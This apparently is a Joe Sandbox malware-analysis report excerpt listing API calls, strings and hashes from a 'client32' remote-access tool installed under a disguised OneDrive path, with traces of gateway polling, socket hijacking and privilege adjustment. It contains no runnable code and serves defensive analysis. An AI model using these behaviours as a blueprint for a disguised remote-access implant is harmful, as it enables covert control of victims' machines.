                                                        • Instruction Fuzzy Hash: CAA2D475E006569FEB90DB64DC80BEFB7B5AF45305F0081D9E849A7280EB70AE85CF61

                                                        APIs
                                                          • Part of subcall function 6C8042F0: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C8078D1,00000000,00000000,6C8498DA,?,00000080), ref: 6C804302
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000,?,000001BB,FFFFFFFF,?), ref: 6C8090F5
                                                        • LeaveCriticalSection.KERNEL32(6C849898,?,?,?,?,?,?,6C811D39,00002000,?,000001BB,FFFFFFFF,?,?,00000000,?), ref: 6C80912D
                                                        • LeaveCriticalSection.KERNEL32(6C849898,?,?,?,?,?,?,6C811D39,00002000,?,000001BB,FFFFFFFF,?,?,00000000,?), ref: 6C809159
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000), ref: 6C8091AD
                                                        • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000), ref: 6C8091F0
                                                        • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000), ref: 6C8091FC
                                                        • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C80922A
                                                        • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809247
                                                        • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809273
                                                        • bind.WSOCK32(00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809296
                                                        • WSAGetLastError.WSOCK32(00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C80929F
                                                        • closesocket.WSOCK32(00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092A7
                                                        • htons.WSOCK32(00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092D7
                                                        • WSASetBlockingHook.WSOCK32(6C804E60,00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092E5
                                                        • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092FB
                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809302
                                                        • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809308
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C80935A
                                                        • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809361
                                                        • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809367
                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8093A5
                                                        • EnterCriticalSection.KERNEL32(6C849898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8093B4
                                                        • LeaveCriticalSection.KERNEL32(6C849898), ref: 6C809438
                                                        • GetTickCount.KERNEL32 ref: 6C809444
                                                        • InterlockedExchange.KERNEL32(6C811CC9,00000000), ref: 6C809452
                                                          • Part of subcall function 6C808CE0: wsprintfA.USER32 ref: 6C808D37
                                                          • Part of subcall function 6C808CE0: inet_ntoa.WSOCK32(00000000), ref: 6C808D43
                                                          • Part of subcall function 6C808CE0: _sprintf.LIBCMT ref: 6C808D7D
                                                          • Part of subcall function 6C808CE0: _free.LIBCMT ref: 6C808D83
                                                          • Part of subcall function 6C808CE0: GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6C808DCC
                                                          • Part of subcall function 6C808CE0: WSAGetLastError.WSOCK32 ref: 6C808DF0
                                                        Strings
                                                        • Connect error to %s using hijacked socket, error %d, xrefs: 6C8091B9
                                                        • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C809371
                                                        • Cannot connect to gateway %s, error %d, xrefs: 6C809312
                                                        • *TcpNoDelay, xrefs: 6C80924E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CriticalSection$BlockingHook$LeaveUnhookclosesocket$Enterinet_ntoa$AddressCountExchangeInterlockedProcTick_free_sprintfbindhtonssocketwsprintf
                                                        • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                        • API String ID: 1690749424-2561115898
                                                        • Opcode ID: 19bad86ffa116f219e6fb621aacd8d7c27355f0d39513604b49dcf63d91ba6ad
                                                        • Instruction ID: e64b14dea120e3bfee8ab51891098bae78e3847e0530e18c7df656390e1e35df
                                                        • Opcode Fuzzy Hash: 19bad86ffa116f219e6fb621aacd8d7c27355f0d39513604b49dcf63d91ba6ad
                                                        • Instruction Fuzzy Hash: EEB1D471B01108AFDB24DF98DE81BDDB7B5EF89318F104979E809ABB80DB749945CB90

                                                        APIs
                                                        • IsWindow.USER32(0001042A), ref: 11129E01
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129E0F
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129E47
                                                        • GetForegroundWindow.USER32 ref: 11129E62
                                                        • EnableWindow.USER32(0001042A,00000000), ref: 11129E7C
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129E98
                                                        • SetForegroundWindow.USER32(00000000), ref: 11129EA7
                                                        • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11129EE5
                                                        • IsWindowVisible.USER32(00000000), ref: 11129EF4
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129F24
                                                        • IsIconic.USER32(0001042A), ref: 11129F31
                                                        • GetForegroundWindow.USER32 ref: 11129F3B
                                                          • Part of subcall function 111228E0: ShowWindow.USER32(0001042A,11129D52,?,11129D52,00000007,?,?,?,?,?,00000000), ref: 111228EE
                                                        • SetForegroundWindow.USER32(00000000), ref: 11129F61
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129F70
                                                        • GetLastError.KERNEL32 ref: 1112A02D
                                                        • GetLastError.KERNEL32 ref: 1112A0A5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundVisible$Enable$ErrorLast$FindIconicShow
                                                        • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$Reactivate main window$Shell_TrayWnd$disableRunplugin
                                                        • API String ID: 3497382234-2745087410
                                                        • Opcode ID: 03e229f3001578359e413258553aba7f5d85a076d8a2a6da1e0c262e5ead9f6f
                                                        • Instruction ID: 89bfc5eb453e7e361dc174284ec43732ba9e27439f8ef9c29a8ac0fe06485c00
                                                        • Opcode Fuzzy Hash: 03e229f3001578359e413258553aba7f5d85a076d8a2a6da1e0c262e5ead9f6f
                                                        • Instruction Fuzzy Hash: 0CD13435A01231AFDF10DF24DD89F9AF762AB80B4CFA04539EC1957288EF716840CB92
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108108C
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110810AA
                                                        • LoadLibraryA.KERNEL32(?), ref: 110810EC
                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11081107
                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108111C
                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108112D
                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108113E
                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108114F
                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11081160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                        • API String ID: 2201880244-3035937465
                                                        • Opcode ID: 0a76712465da8a1f89cb356c9f725acde3d7fc538e30262e756dcc55fc0ce3ce
                                                        • Instruction ID: 5e0f03c7a272b42dabbdc436788095eb74915ed0ff03ab5e2eae34a55ab18380
                                                        • Opcode Fuzzy Hash: 0a76712465da8a1f89cb356c9f725acde3d7fc538e30262e756dcc55fc0ce3ce
                                                        • Instruction Fuzzy Hash: 7751B378E0870A9FD711DF7ACC90AA6FBF8AF55314B1189AED8A5C7640DA70E580CF50
                                                        APIs
                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini), ref: 6C815A70
                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C815A80
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C815B26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CreateHandleModuleMutexPrivateProfile
                                                        • String ID: C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini$Trace$TraceFile$TraceRecv$TraceSend$_debug$htctl.packet_tracing$mode$nsmtrace$pci.ini
                                                        • API String ID: 2872646933-1634281601
                                                        • Opcode ID: 3a145e10b277d7dd7f98602bfaa6678b4153f5d4d1a110da4e054b4b40d8b7ed
                                                        • Instruction ID: 91ec5c5e8e5a35a3ccea35b302cb67ffbeb0ff71c2f6b69e53a59708815eb758
                                                        • Opcode Fuzzy Hash: 3a145e10b277d7dd7f98602bfaa6678b4153f5d4d1a110da4e054b4b40d8b7ed
                                                        • Instruction Fuzzy Hash: D02160B4684359AFE730BF646F94A573BA8A66624CB149C39E458D3F03E7346808D7D0
                                                        APIs
                                                        • GetSystemTime.KERNEL32(?,?,?,937B5537,DB83AE95,937B54B7,FFFFFFFF,00000000), ref: 6C811831
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C81183B
                                                        • GetSystemTime.KERNEL32(?,DB83AE95,937B54B7,FFFFFFFF,00000000), ref: 6C811875
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C81187F
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,937B5537), ref: 6C811909
                                                        • LeaveCriticalSection.KERNEL32(6C849898), ref: 6C81191B
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C811990
                                                          • Part of subcall function 6C81A090: __strdup.LIBCMT ref: 6C81A0AA
                                                          • Part of subcall function 6C81A170: _free.LIBCMT ref: 6C81A19D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                        • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                        • API String ID: 1510130979-3441452530
                                                        • Opcode ID: 33434caaf5d8d7b4fea33e01ccf67d54e9fb9794de6aaf5812c6ad881af631a3
                                                        • Instruction ID: e6aff1ff178197c77b51d642ce02968ec28f133900aac9b4f9a0c860d2ca4472
                                                        • Opcode Fuzzy Hash: 33434caaf5d8d7b4fea33e01ccf67d54e9fb9794de6aaf5812c6ad881af631a3
                                                        • Instruction Fuzzy Hash: DC616171904219AFDB24DFE4DA80EEEB7B9FB48314F448D2DE415A7B40DB34A508CBA1
                                                        APIs
                                                        • GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                        • _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        • _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11152C8A: __isdigit_l.LIBCMT ref: 11152CAF
                                                        • RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                        • String ID: CSDVersion$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                        • API String ID: 3299820421-3310072378
                                                        • Opcode ID: 7ab92e51ad01e1907d7b427f1449cbf7b293f8cedb1a70cc30572aa3416370ee
                                                        • Instruction ID: 3b0f4771cf844cdb0b0f75355f5e50aa58b9dccac0828de2761a27a020c1cb56
                                                        • Opcode Fuzzy Hash: 7ab92e51ad01e1907d7b427f1449cbf7b293f8cedb1a70cc30572aa3416370ee
                                                        • Instruction Fuzzy Hash: 2D416E79E50215ABDF20CF60CC44FDEFBB49B8531DF100568F91956688E6307940CF91
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 1108F8D4
                                                        • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?), ref: 1108F8E7
                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111AC67C,?), ref: 1108F904
                                                        • CoUninitialize.COMBASE ref: 1108F922
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                        • API String ID: 3222248624-258972079
                                                        • Opcode ID: e60eba5eeb344acb8759f58af3e6bf86e3ef3d66aa5fb3739c6cfdd7dd58bbd8
                                                        • Instruction ID: 770ce8111ca66446bd8ca763adae3b9fe85744b9a4d07a8ee584aead76b08d87
                                                        • Opcode Fuzzy Hash: e60eba5eeb344acb8759f58af3e6bf86e3ef3d66aa5fb3739c6cfdd7dd58bbd8
                                                        • Instruction Fuzzy Hash: 5801A175F015197FDB00DBB58C49AEFBB78AF05608F10406CFA55D7104EA31EA0087E2
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                        • API String ID: 2102423945-35127696
                                                        • Opcode ID: c3ecfa7420b948e47ebb5e2de70d7ea8b1f3f183f60ef3a79e0d604a368113f0
                                                        • Instruction ID: 1a78bdd532166b519948713500080bf5a329ee9b8eb99bc9d5adcd4aa2325004
                                                        • Opcode Fuzzy Hash: c3ecfa7420b948e47ebb5e2de70d7ea8b1f3f183f60ef3a79e0d604a368113f0
                                                        • Instruction Fuzzy Hash: 7AB19075E00615AFE704CFA8DC81FEEB7F9FF88304F148169E9199B295DA70A941CB90
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(1102CBF0,?,00000000), ref: 1102F544
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                        • API String ID: 3192549508-611217420
                                                        • Opcode ID: 4eab6215739f9884cf541315221468652090f083f0c597e6065554ff95b3bc8c
                                                        • Instruction ID: c0b43f1959f31bc3ff899fb62870b938a0e0ae705628d7a6d3f14f32828bbd8a
                                                        • Opcode Fuzzy Hash: 4eab6215739f9884cf541315221468652090f083f0c597e6065554ff95b3bc8c
                                                        • Instruction Fuzzy Hash: 12F04F74900122DFC706DF69EC94A8DF7A1EF5860CB148539EC1457348EB7069008B95
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,?,00000000), ref: 11096C88
                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11096CA4
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,111DA704,?,00000001,00000001), ref: 11096CD0
                                                        • EqualSid.ADVAPI32(?,0109D280,?,00000001,00000001), ref: 11096CE3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                        • String ID:
                                                        • API String ID: 1878589025-0
                                                        • Opcode ID: 3513740187f7c4b306437e11a9b873ce9c80dec7f112a18a8bdffc49cb84d1ba
                                                        • Instruction ID: aa5dce42b75e03a3a8ef6c037090e6362b52afdfa5aa590746b819f611b8b8b3
                                                        • Opcode Fuzzy Hash: 3513740187f7c4b306437e11a9b873ce9c80dec7f112a18a8bdffc49cb84d1ba
                                                        • Instruction Fuzzy Hash: EB215075F01219AFEB00DBA5DD91BFEB7B8EF45704F114069ED29D7180E671A900CBA1
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,1102E62B,00000000,00000000,00080000,82E0FB89,00080000,00000000,00000000), ref: 110957BD
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 110957C4
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 110957D5
                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 110957F9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                        • String ID:
                                                        • API String ID: 2349140579-0
                                                        • Opcode ID: 0aca1979a8b40330feb026a925631bbf072c9ab4aa1e9dcba116c2c53325dd2e
                                                        • Instruction ID: 79cce8e325d1ff2264d6913acd6930832bfb3e6363bf0221359440810bb14152
                                                        • Opcode Fuzzy Hash: 0aca1979a8b40330feb026a925631bbf072c9ab4aa1e9dcba116c2c53325dd2e
                                                        • Instruction Fuzzy Hash: 15014CB6600219AFD710DF98CC89BAEF7BCFF48705F10456DE90697184DBB06A04CBA1
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,11096B50,00000244,cant create events), ref: 1109583C
                                                        • CloseHandle.KERNEL32(?,00000000,11096B50,00000244,cant create events), ref: 11095845
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: bb2189a0ce0e681acf5e2c3f9941def6db024e7673ae4e4681922f78f91d01b4
                                                        • Instruction ID: 2dc9c20525e0398814adb1e9c50c9e564b761da8d4f29b98c64898ead9ee3d7b
                                                        • Opcode Fuzzy Hash: bb2189a0ce0e681acf5e2c3f9941def6db024e7673ae4e4681922f78f91d01b4
                                                        • Instruction Fuzzy Hash: 32E0EC71704211ABE738CF159C94FA777ECAF04B01F11496EF957E6184CA61E8408B64
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • GetSystemMetrics.USER32(00002000), ref: 1102CF04
                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D0C5
                                                          • Part of subcall function 111035C0: GetCurrentThreadId.KERNEL32 ref: 11103656
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
                                                          • Part of subcall function 111035C0: EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
                                                          • Part of subcall function 111035C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D101
                                                        • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102D129
                                                        • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102D3E6
                                                          • Part of subcall function 1108DAC0: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102D158,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DADC
                                                          • Part of subcall function 1108DAC0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102D158,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DAE9
                                                          • Part of subcall function 1108DAC0: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DB19
                                                        • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102D188
                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102D194
                                                        • CloseHandle.KERNEL32(00000000), ref: 1102D1AC
                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D1B9
                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D1DB
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102CF36
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • LoadIconA.USER32(11000000,000004C1), ref: 1102D571
                                                        • LoadIconA.USER32(11000000,000004C2), ref: 1102D581
                                                        • DestroyCursor.USER32(00000000), ref: 1102D5AA
                                                        • DestroyCursor.USER32(00000000), ref: 1102D5BE
                                                        • GetVersion.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DAEF
                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DB42
                                                        • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,View,Client), ref: 1102E054
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E08E
                                                        • DispatchMessageA.USER32(?), ref: 1102E098
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E0AA
                                                        • CloseHandle.KERNEL32(00000000,11025FA0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102E345
                                                        • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102E37A
                                                        • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 1102E381
                                                        • SetWindowPos.USER32(0001042A,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102E3B1
                                                        • CloseHandle.KERNEL32(00000000,11055780,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102E42F
                                                        • wsprintfA.USER32 ref: 1102E575
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • PostMessageA.USER32(NSMWControl32,00000000,Default,Client,UseIPC,00000001,00000000), ref: 1102E66C
                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E680
                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E6A6
                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E6CC
                                                          • Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                          • Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                          • Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
